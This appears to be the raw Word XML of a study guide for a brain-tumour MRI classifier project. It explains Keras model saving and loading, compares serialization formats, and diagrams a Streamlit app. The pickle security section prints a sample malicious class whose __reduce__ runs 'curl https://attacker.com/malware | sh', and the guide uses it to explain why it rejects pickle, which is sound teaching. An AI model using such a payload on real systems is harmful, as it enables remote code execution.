      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> format is actually a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>standard ZIP archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing structured components: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brain_tumor_mobilenetv2_full_scratch.keras (ZIP Archive)</w:t>
              <w:br/>
              <w:t>├── config.json               # Complete neural network topology &amp; layer connection graph</w:t>
              <w:br/>
              <w:t>├── model.weights.h5          # Layer weights and bias tensors stored in high-speed HDF5 format</w:t>
              <w:br/>
              <w:t>└── metadata.json             # Framework version, Keras version, and date metadata</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9.2 Exact Saving Code Dissected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notebooks/02_model_training.ipynb</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FULL_MODEL_PATH = BASE_DIR / "models" / "brain_tumor_mobilenetv2_full_scratch.keras"</w:t>
              <w:br/>
              <w:br/>
              <w:t>callbacks_full = [</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ModelCheckpoint(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        filepath=str(FULL_MODEL_PATH),</w:t>
              <w:br/>
              <w:t xml:space="preserve">        monitor="loss",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        mode="min",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        save_best_only=True,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        verbose=1</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ),</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ReduceLROnPlateau(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        monitor="loss",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        mode="min",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        factor=0.2,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        patience=2,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        min_lr=1e-6,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        verbose=1</w:t>
              <w:br/>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
              <w:t>]</w:t>
              <w:br/>
              <w:br/>
              <w:t>history_full = full_model.fit(</w:t>
              <w:br/>
              <w:t xml:space="preserve">    full_train_ds,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    epochs=8,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    callbacks=callbacks_full,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    verbose=1</w:t>
              <w:br/>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ModelCheckpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: An automated callback hook listening at the end of each epoch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>monitor="loss", mode="min"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Compares the training loss of the current epoch against the historical minimum.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>save_best_only=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: If Epoch 7 achieves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>loss = 0.1639</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Epoch 8 has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>loss = 0.1672</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, Keras ignores Epoch 8 and preserves the Epoch 7 checkpoint on disk!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>filepath=str(FULL_MODEL_PATH)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Writes the complete architecture and weights atomically to disk.</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9.3 Exact Loading Code Dissected</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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@st.cache_resource(show_spinner=False)</w:t>
              <w:br/>
              <w:t>def load_neuroscan_model():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Loads and caches the best trained model in memory.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    preferred_path = BASE_DIR / "models" / "brain_tumor_mobilenetv2_full_scratch.keras"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    fallback_path = BASE_DIR / "models" / "brain_tumor_mobilenetv2_best.keras"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    model_path = preferred_path if preferred_path.exists() else fallback_path</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if not model_path.exists():</w:t>
              <w:br/>
              <w:t xml:space="preserve">        st.error(f"Model file not found at: {model_path}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return None, None</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    model = tf.keras.models.load_model(model_path)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    base_model = [l for l in model.layers if "mobilenet" in l.name.lower()][0]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return model, base_model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Why Loading Differs Radically from Training:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>No Gradient Tape Overhead:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> During training, TensorFlow must allocate memory buffers for backward gradients. During loading, the computational graph is loaded in pure forward-inference mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Deterministic Evaluation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> All Dropout layers are placed into inactive mode, and Batch Normalization layers use their frozen population running statistics ($\mu, \sigma^2$) rather than computing batch metrics.</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9.4 Serialization Format Comparison &amp; Security Vulnerabilities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120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Format</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Extension</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Primary Framework</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Security Risk</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Human-Readable Structure?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Project Decision</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**Keras v3 Native**</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`.keras`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Keras 3 / TensorFlow 2.16+</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**Low** (Safe JSON config + HDF5 weights)</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Partial (ZIP archive with JSON)</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**Adopted (Primary Production Artifact)**</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**Legacy HDF5**</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`.h5`</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Keras 2 / Legacy TF</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Low / Medium</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No (Binary HDF5 container)</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Supported as historical fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>**Python Pickle**</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`.pkl`</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Standard Python</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**EXTREME CRITICAL RISK**</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No (Binary bytecode stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>**STRICTLY REJECTED**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>**Joblib**</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`.joblib`</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Scikit-Learn</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**EXTREME CRITICAL RISK**</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No (Compressed Pickle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Not used (designed for Scikit-learn, not Keras)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Critical Pickle Security Exploit (Interview Essential)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Never use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for deep learning model serialization in production!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pickle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialization format allows classes to define a special </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__reduce__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> method.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pickle.load()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> deserializes a file, it executes whatever callable is returned by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__reduce__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker can craft a malicious </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.pkl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file that executes arbitrary operating system commands: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import os</w:t>
              <w:br/>
              <w:t xml:space="preserve">  class MaliciousPayload:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      def __reduce__(self):</w:t>
              <w:br/>
              <w:t xml:space="preserve">          return (os.system, ("curl https://attacker.com/malware | sh",))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The moment a hospital server loads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>model.pkl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, the server is compromised!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Our project uses `.keras`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, which deserializes model topology purely from declarative JSON dictionaries and loads numerical arrays directly into tensor buffers, completely mitigating arbitrary code execution.</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10: Frontend and Backend Connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>10.1 The Streamlit Execution Model: In-Process Reactive Computation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A critical concept for software engineering interviews is explaining </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>how Streamlit actually works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to traditional web development:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Traditional Web Application (Decoupled Client-Server)</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User Browser (React/Vue/HTML) ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">             │ HTTP POST /api/predict (JSON payload or Multipart Form)</w:t>
              <w:br/>
              <w:t xml:space="preserve">             ▼</w:t>
              <w:br/>
              <w:t>[ Web Server (FastAPI / Flask / Django) ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">             │</w:t>
              <w:br/>
              <w:t xml:space="preserve">             │ Preprocesses bytes -&gt; Model.predict() -&gt; Formats JSON response</w:t>
              <w:br/>
              <w:t xml:space="preserve">             ▼</w:t>
              <w:br/>
              <w:t>[ User Browser (React) parses JSON &amp; updates virtual DOM ]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>NeuroScan AI Architecture (Streamlit Reactive In-Process Model)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In our project, there is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>no separate REST API, no JSON serialization layer, and no Flask/FastAPI server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>the frontend and backend live within the exact same Python process</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w:t>
              <w:br/>
              <w:t>|                  SINGLE STREAMLIT PYTHON RUNTIME PROCESS                |</w:t>
              <w:br/>
              <w:t>|                                                                         |</w:t>
              <w:br/>
              <w:t>|  1. Browser Interaction (User clicks dropdown / uploads image)          |</w:t>
              <w:br/>
              <w:t>|                           │                                             |</w:t>
              <w:br/>
              <w:t>|                           ▼ (Websocket Event)                           |</w:t>
              <w:br/>
              <w:t>|  2. Streamlit re-executes app.py from Top to Bottom                     |</w:t>
              <w:br/>
              <w:t>|                           │                                             |</w:t>
              <w:br/>
              <w:t>|  3. Hits @st.cache_resource -&gt; Model already in RAM! (0 ms overhead)   |</w:t>
              <w:br/>
              <w:t>|                           │                                             |</w:t>
              <w:br/>
              <w:t>|  4. Directly calls Python functions:                                    |</w:t>
              <w:br/>
              <w:t>|     • compute_gradcam(img_tensor, model, base_model)                    |</w:t>
              <w:br/>
              <w:t>|     • create_superimposed_overlay(img_resized, heatmap)                 |</w:t>
              <w:br/>
              <w:t>|                           │                                             |</w:t>
              <w:br/>
              <w:t>|  5. Computes NumPy arrays &amp; updates UI elements in real time            |</w:t>
              <w:br/>
              <w:t>|                           │                                             |</w:t>
              <w:br/>
              <w:t>|                           ▼ (Serialized Protobuf Delta Stream)          |</w:t>
              <w:br/>
              <w:t>|  6. Browser updates DOM elements immediately                            |</w:t>
              <w:br/>
              <w:t>+-------------------------------------------------------------------------+</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10.2 Sequence Diagram of User Interaction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User                  Browser (DOM)             Streamlit Engine              Keras Model / Grad-CAM</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> ├── Selects Sample Scan ─&gt;│                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         ├── Send WebSocket Event ──&gt;│                                │</w:t>
              <w:br/>
